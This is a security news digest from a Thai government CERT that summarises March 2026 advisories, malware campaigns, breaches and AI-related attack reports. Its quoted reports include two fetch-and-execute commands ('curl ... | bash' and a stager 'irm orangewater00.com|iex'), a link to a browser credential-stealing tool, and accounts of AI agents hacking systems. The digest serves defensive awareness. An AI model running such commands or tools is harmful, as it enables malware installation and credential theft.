NCSA Webboard

    Cyber Threat Intelligence 10 March 2026

    Cyber Security News
    • NCSA_THAICERT

      Industrial Sector

      • Portwell Engineering Toolkits
        "Successful exploitation of this vulnerability could allow a local attacker to escalate privileges or cause a denial-of-service condition."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-04
      • Labkotec LID-3300IP
        "Successful exploitation of this vulnerability could allow attackers to gain unauthorized control over system operations, leading to disruption of normal functionality and potential safety hazards."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-05
      • Mobiliti e-Mobi.hu
        "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-06
      • ePower Epower.ie
        "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-07
      • Everon OCPP Backends
        "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-08
      • Mitsubishi Electric MELSEC iQ-F Series EtherNet/IP Module And Ethernet Module
        "Successful exploitation of these vulnerabilities could allow a remote attacker to cause a denial-of-service condition by continuously sending UDP packets to the affected products."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-62-01
      • Hitachi Energy Relion REB500 Product
        "Hitachi Energy is aware of vulnerabilities that affect the Relion REB500 product versions listed in this document. Authenticated users with certain roles can exploit the vulnerabilities to access and modify the directory contents they are not authorized to do so. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-02
      • Hitachi Energy RTU500 Product
        "Hitachi Energy is aware of vulnerabilities that affect RTU500 product versions listed in this document. Successful exploitation of these vulnerabilities can result in the exposure of low-value user management information and device outage. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-03
      • Delta Electronics CNCSoft-G2
        "Successful exploitation of this vulnerability could result in an attacker achieving remote code execution on the device."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-064-01

      New Tooling

      • DumpBrowserSecrets – Browser Credential Harvesting With App-Bound Encryption Bypass
        "DumpBrowserSecrets is a post-exploitation credential-harvesting tool from Maldev Academy that extracts secrets across all major browsers from a single Windows executable. It is the successor to their earlier DumpChromeSecrets project, which is now deprecated, and extends coverage from Chrome alone to the full range of Chromium-based and Gecko-based browsers in common enterprise use."
        https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/
        https://github.com/Maldev-Academy/DumpBrowserSecrets

      Vulnerabilities

      • CISA Adds Three Known Exploited Vulnerabilities To Catalog
        "CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2021-22054 Omnissa Workspace ONE Server-Side Request Forgery
        CVE-2025-26399 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
        CVE-2026-1603 Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability"
        https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog
      • Partnering With Mozilla To Improve Firefox’s Security
        "AI models can now independently identify high-severity vulnerabilities in complex software. As we recently documented, Claude found more than 500 zero-day vulnerabilities (security flaws that are unknown to the software’s maintainers) in well-tested open-source software. In this post, we share details of a collaboration with researchers at Mozilla in which Claude Opus 4.6 discovered 22 vulnerabilities over the course of two weeks. Of these, Mozilla assigned 14 as high-severity vulnerabilities—almost a fifth of all high-severity Firefox vulnerabilities that were remediated in 2025. In other words: AI is making it possible to detect severe security vulnerabilities at highly accelerated speeds."
        https://www.anthropic.com/news/mozilla-firefox-security
        https://securityaffairs.com/189131/ai/anthropic-claude-opus-ai-model-discovers-22-firefox-bugs.html
      • AI Vs AI: Agent Hacked McKinsey's Chatbot And Gained Full Read-Write Access In Just Two Hours
        "Researchers at red-team security startup CodeWall say their AI agent hacked McKinsey's internal AI platform and gained full read and write access to the chatbot in just two hours. It's yet another indicator that agentic AI is becoming a more effective tool for conducting cyberattacks, including those against other AI systems. This attack wasn’t conducted with malicious intent. However, threat hunters tell us that miscreants are increasingly using agents in real-world attacks, indicating that machine-speed intrusions aren't going away."
        https://www.theregister.com/2026/03/09/mckinsey_ai_chatbot_hacked/

      Malware

      • New A0Backdoor Linked To Teams Impersonation And Quick Assist Social Engineering
        "BlueVoyant Security Operations Center (SOC) and Threat Fusion Cell (TFC) continue to track an activity cluster that uses email bombing and IT-support impersonation over Microsoft Teams to obtain Quick Assist access, then pivot to a deeper attack. This research shows that once on the victim’s host, the actors sideload a malicious DLL to deliver a new backdoor BlueVoyant has dubbed the A0Backdoor. The malware’s loader exhibits anti-sandbox evasion, and the campaign’s command-and-control appears to have pivoted to a covert DNS mail exchange-based channel that confines endpoint traffic to trusted recursive resolvers."
        https://www.bluevoyant.com/blog/new-a0backdoor-linked-to-teams-impersonation-and-quick-assist-social-engineering
        https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/
      • ShinyHunters Claims Ongoing Salesforce Aura Data Theft Attacks
        "Salesforce is warning customers that hackers are targeting websites with misconfigured Experience Cloud platforms that give guest users access to more data than intended. However, the ShinyHunters extortion gang claims to be actively exploiting a new bug to steal data from instances. Salesforce has shared guidance for its customers to defend against hackers actively targeting the /s/sfsites/aura API endpoint on misconfigured Experience Cloud instances that gives guest users access to more data than intended. The company states that attackers are deploying a modified version of AuraInspector, an open-source auditing tool developed by Mandiant, which can help administrators identify access control misconfigurations within the Salesforce Aura framework."
        https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/
        https://www.salesforce.com/blog/protecting-your-data-essential-actions-to-secure-experience-cloud-guest-user-access/
        https://www.theregister.com/2026/03/09/shinyhunters_claims_more_highprofile_victims/
      • FBI Warns Of Phishing Attacks Impersonating US City, County Officials
        "The Federal Bureau of Investigation (FBI) warns that criminals are impersonating U.S. officials in phishing attacks targeting businesses and individuals who request city and county planning and zoning permits. In a public service announcement published on Monday, the bureau said that the criminals behind this campaign are identifying potential victims using publicly available information, which also makes their malicious messages seem legitimate and helps them trick suspicious targets."
        https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/
        https://www.ic3.gov/PSA/2026/PSA260309
        https://securityaffairs.com/189165/cyber-crime/fbi-alert-scammers-target-zoning-permit-applicants.html
      • China-Nexus Activity Against Qatar Observed Amid Expanding Regional Tensions
        "Since the recent escalation in the Middle East, Check Point Research has observed increased activity by Chinese-nexus APT actors in the region, particularly targeting Qatar. The Chinese-nexus threat actor Camaro Dragon attempted to deploy a variant of PlugX malware against Qatari targets within one day of the launch of Operation Epic Fury and the onset of the escalation in the Middle East. The attackers leveraged the ongoing war in the Middle East to make their lures more credible and engaging, demonstrating the ability to rapidly adapt to major developments and breaking news."
        https://blog.checkpoint.com/research/china-nexus-activity-against-qatar-observed-amid-expanding-regional-tensions/
      • ACSC, NCSC, And CERT Tonga Warn Of Growing INC Ransom Activity Targeting Healthcare And Organizations Across Australia, New Zealand, And Pacific States
        "Cybersecurity agencies across the Pacific region are sharing concerns about the ransomware group INC Ransom’s expanding activities and the growing influence of its affiliate network. A joint advisory issued by the Australian Cyber Security Centre (ACSC), National Computer Emergency Response Team Tonga (CERT Tonga), and the New Zealand National Cyber Security Centre (NCSC) highlights how the INC Ransom ecosystem has become an active threat to organizations in Australia, New Zealand, and Pacific Island states."
        https://cyble.com/blog/inc-ransom-attacks-australia-new-zealand/
      • Hackerbot-Claw: Adversarial Agent Targets Top GitHub Repos
        "Pillar Security researchers analyzed the hackerbot-claw campaign, which we named “Chaos Agent” - the first publicly documented campaign where an AI agent, operating on natural-language instructions, conducted an end-to-end attack against production open-source infrastructure. Within 37 hours, hackerbot-claw identified vulnerable open-source projects, crafted targeted exploits, compromised CI/CD pipelines, and published a malicious extension that turned developers' own AI coding tools into credential-stealing accomplices."
        https://www.pillar.security/blog/hackerbot-claw-adversarial-agent-targets-top-github-repos
        https://hackread.com/ai-bot-hackerbot-claw-microsoft-datadog-github-repos/
      • Someone Else’s SIEM: A Threat Actor Abuses Another Free Trial
        "Huntress discovered a threat actor was exploiting vulnerabilities (like SolarWinds Web Help Desk) and exfiltrating victim data to a free trial instance of Elastic Cloud SIEM. The actor used the SIEM for victim triage, and the infrastructure revealed details about their campaign, including disposable email services (quieresmail.com), connections to a Russian-registered temporary email network (firstmail.ltd), use of a SAFING_VPN tunnel, and a possible connection to other opportunistic attacks against Microsoft SharePoint and other software. The instance has since been taken down."
        https://www.huntress.com/blog/threat-actor-abuses-elastic-cloud-siem
        https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
      • Fake Claude Code Install Pages Hit Windows And Mac Users With Infostealers
        "Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter. That habit turns the website into a remote control: whatever script lives at that URL runs with your permissions, often those of an administrator."
        https://www.malwarebytes.com/blog/news/2026/03/fake-claude-code-install-pages-hit-windows-and-mac-users-with-infostealers
      • Quiz Sites Trick Users Into Enabling Unwanted Browser Notifications
        "Our support team flagged a number of customers who suspected their device might be infected with malware, but Malwarebytes scans came up empty. When the customers provided screenshots, our Malware Removal Support team quickly recognized the format as web push notifications. The reason the scans came up clean is that these notifications aren’t malware on the device. They’re browser notifications from websites that trick users into clicking “Allow.”"
        https://www.malwarebytes.com/blog/threat-intel/2026/03/quiz-sites-trick-users-into-enabling-unwanted-browser-notifications
      • GhostClaw Unmasked: A Malicious Npm Package Impersonating OpenClaw To Steal Everything
        "The JFrog Security research team has identified a live malicious npm package named @openclaw-ai/openclawai. This package masquerades as a legitimate CLI tool called "OpenClaw Installer" while deploying a multi-stage infection chain that steals system credentials, browser data, crypto wallets, SSH keys, Apple Keychain databases, iMessage history, and more - then installs a persistent RAT with full remote access capabilities including a SOCKS5 proxy and live browser session cloning. The attack is notable for its broad data collection, its use of social engineering to harvest the victim's system password, and the sophistication of its persistence and C2 infrastructure. Internally, the malware identifies itself as GhostLoader."
        https://research.jfrog.com/post/ghostclaw-unmasked/
        https://thehackernews.com/2026/03/malicious-npm-package-posing-as.html
      • From a Sophisticated Browser-Extension Supply-Chain Compromise To a VibeCoded Twist: A Chrome Extension As The Initial Access Vector For a Broader Malware Chain
        "A formerly legitimate Featured Chrome extension (ShotBird) was turned into a remote-controlled malware channel after an apparent ownership transfer. The malicious version beaconed to attacker infrastructure, received callback-delivered JavaScript tasks, stripped browser security headers, injected fake Chrome update lures, and captured sensitive form data. In the observed Windows file-delivery path, victims were pushed to run googleupdate.exe, a fake update wrapper that carried a real Google-signed ChromeSetup.exe alongside a malicious psfx.msi stager. Host-side PowerShell 4104 logs later confirmed execution of the decoded stager irm orangewater00.com|iex and allowed reconstruction of a larger second stage with ETW suppression, Credential Manager access, Chromium data targeting, and upload logic. In short: this was not just extension abuse, but a browser-to-endpoint compromise chain with likely credential-theft capability."
        https://monxresearch-sec.github.io/shotbird-extension-malware-report/
        https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html

      Breaches/Hacks/Leaks

      • Ericsson US Discloses Data Breach After Service Provider Hack
        "Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to an undisclosed number of employees and customers after hacking one of its service providers. Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide. In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider who was storing personal data for employees and customers discovered a breach on April 28, 2025."
        https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/
      • EV Charger Biz ELECQ Zapped By Ransomware Crooks, Customer Contact Data Stolen
        "ELECQ, maker of smart electric vehicle (EV) chargers, is warning customers that their personal details may have been stolen in a ransomware attack that encrypted and copied user data from its cloud systems. In a notice sent to customers on Monday and seen by The Register, the EV charging outfit said that it detected "unusual activity" on its AWS cloud platform on March 7 and quickly discovered that attackers had launched a ransomware attack against parts of its infrastructure."
        https://www.theregister.com/2026/03/09/ransomware_crooks_hit_ev_charger/

      General News

      • Google: Cloud Attacks Exploit Flaws More Than Weak Credentials
        "Hackers are increasingly exploiting newly disclosed vulnerabilities in third-party software to gain initial access to cloud environments, with the window for attacks shrinking from weeks to just days. At the same time, the use of weak credentials or misconfigurations has dropped significantly in the second half of 2025, Google notes in a report highlighting the trends on threats to cloud users. According to the report, incident responders determined that bug exploits were the primary access vector in 44.5% of the investigated intrusions, while credentials were responsible for 27% of the breaches."
        https://www.bleepingcomputer.com/news/security/google-cloud-attacks-exploit-flaws-more-than-weak-credentials/
        https://services.google.com/fh/files/misc/cloud_threat_horizons_report_h12026.pdf
      • Dutch Govt Warns Of Signal, WhatsApp Account Hijacking Attacks
        "Russian state-sponsored hackers have been linked to an ongoing Signal and WhatsApp phishing campaign targeting government officials, military personnel, and journalists to gain access to sensitive messages. This report comes from the Netherlands Defence Intelligence and Security Service (MIVD) and the Netherlands General Intelligence and Security Service (AIVD), who confirmed that Dutch government employees have been targeted in the attacks. The Dutch intelligence agencies say the operation relies on phishing and social-engineering techniques that abuse legitimate authentication features to take over accounts and covertly monitor new messages."
        https://www.bleepingcomputer.com/news/security/dutch-govt-warns-of-signal-whatsapp-account-hijacking-attacks/
        https://therecord.media/russian-hackers-target-signal-whatsapp-warn-dutch-intelligence-agencies
        https://hackread.com/dutch-intel-russia-hackers-hijack-signal-whatsapp-attacks/
        https://securityaffairs.com/189156/intelligence/russia-linked-hackers-target-signal-whatsapp-of-officials-globally.html
        https://www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/
        https://www.helpnetsecurity.com/2026/03/09/signal-whatsapp-accounts-russian-hackers/
      • Are We Ready For Auto Remediation With Agentic AI?
        "The key to security program effectiveness is optimizing remediation. This has become increasingly difficult as organizations strive to modernize their processes with innovative technologies, including artificial intelligence (AI). As employees gain capabilities to collaborate and work faster, cyber assets and attack surfaces proliferate, making it difficult for security teams to take the needed actions to mitigate risk. Now, as organizations look to leverage agentic AI in areas such as software development, instead of incrementally increasing productivity, we are expecting exponential gains in productivity, further proliferating attack surfaces. At the same time, the threat landscape will also evolve rapidly, with attackers taking advantage of AI to scale their attacks."
        https://www.darkreading.com/application-security/auto-remediation-agentic-ai
      • More AI Tools, More Burnout! New Research Explains Why
        "Workflows built around multiple AI agents and constant tool switching are adding cognitive strain across large enterprises. A recent Harvard Business Review analysis describes this pattern as “AI brain fry,” a form of mental fatigue tied to intensive use and oversight of AI systems. Employees increasingly manage clusters of agents that generate code, synthesize information, and produce drafts at high speed. Performance systems in some organizations reward activity metrics such as token consumption and AI output volume. This structure pushes workers to monitor more systems and outcomes within the same workday."
        https://www.helpnetsecurity.com/2026/03/09/harvard-business-review-ai-workplace-fatigue-report/
      • Ghanaian Pleads Guilty To Role In $100m Romance Scam
        "A Ghanaian national has pleaded guilty to scamming countless victims as part of a global fraud ring that engaged in romance fraud and business email compromise (BEC). The Justice Department announced the guilty plea for Derrick Van Yeboah, 40, late last week. The fraud operation, which was primarily based in Ghana, is said to have caused over $100m in losses, 10% of which were pinned on Van Yeboah. As per typical scams of this kind, he impersonated romantic partners in online communications with vulnerable victims."
        https://www.infosecurity-magazine.com/news/ghanaian-pleads-guilty-100m/
      • Cloud Threat Horizons Report H1 2026
        "The Google Cloud Threat Horizons Report provides decision-makers with strategic intelligence on threats to not just Google Cloud, but all cloud service providers. The report focuses on recommendations for mitigating risks and improving cloud security for leaders and practitioners. The report is informed by Google Cloud’s Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting, and various Google Cloud intelligence, security, and product teams."
        https://cloud.google.com/security/report/resources/cloud-threat-horizons-report-h1-2026
        https://thehackernews.com/2026/03/unc4899-used-airdrop-file-transfer-and.html
      • White House Cyber Strategy Prioritizes Offense
        "The Trump administration released a notably hawkish vision of American cyber power that blends deregulation at home with deterrence and offense against adversaries abroad. In a relatively brief seven-page document published on Friday, President Trump's Cyber Strategy for America framed cybersecurity both as a defensive IT challenge and as a strategic domain where the US must assert dominance amid intensifying geopolitical rivalries. American response to cyber threats will not be confined to the cyber realm, the document warned."
        https://www.darkreading.com/cybersecurity-operations/white-house-cyber-strategy-prioritizes-offense
        https://www.whitehouse.gov/wp-content/uploads/2026/03/President-Trumps-Cyber-Strategy-for-America.pdf
        https://therecord.media/trump-cyber-strategy-released-regulations
        https://www.bankinfosecurity.com/trump-pledges-action-on-cybercrime-cyberspace-threats-a-30942
        https://www.infosecurity-magazine.com/news/usa-unveils-new-cyber-strategy/
        https://www.securityweek.com/us-cyber-strategy-targets-adversaries-critical-infrastructure-and-emerging-technologies/

      References
      Electronic Transactions Development Agency (ETDA)
